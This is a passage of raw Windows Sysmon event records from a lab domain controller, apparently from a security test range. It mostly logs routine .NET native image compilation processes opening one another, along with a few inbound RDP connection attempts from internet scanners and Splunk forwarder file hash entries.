14:58:50.794{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F90E-00000000BB01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.747{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F80E-00000000BB01}6392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.747{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F80E-00000000BB01}6392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.747{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F80E-00000000BB01}6392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.435{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-45817-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.447{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62524-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000080916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F70E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.685{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F70E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.685{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F70E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.653{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F60E-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.653{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F60E-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.653{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F60E-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.622{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F50E-00000000BB01}6264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.606{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F50E-00000000BB01}6264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.606{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F50E-00000000BB01}6264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.497{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1B38E9AF3AE9049E5E6FA6E909C8C73,SHA256=F1D5ED5492538BE4FBED77182F116CE8ACB9AEF28D1500186A2F7B908A6744D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.497{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D542EFA5E32AA1640F3176EB0945DEFA,SHA256=964C55B0096F6CFE6F969F73B098E0EB31768845E4499742EC120D624B031655,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.466{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F40E-00000000BB01}3596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.466{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F40E-00000000BB01}3596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.466{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F40E-00000000BB01}3596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.200{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F30E-00000000BB01}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.185{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F30E-00000000BB01}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.185{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F30E-00000000BB01}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.060{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F20E-00000000BB01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.044{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F20E-00000000BB01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.044{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-F20E-00000000BB01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.N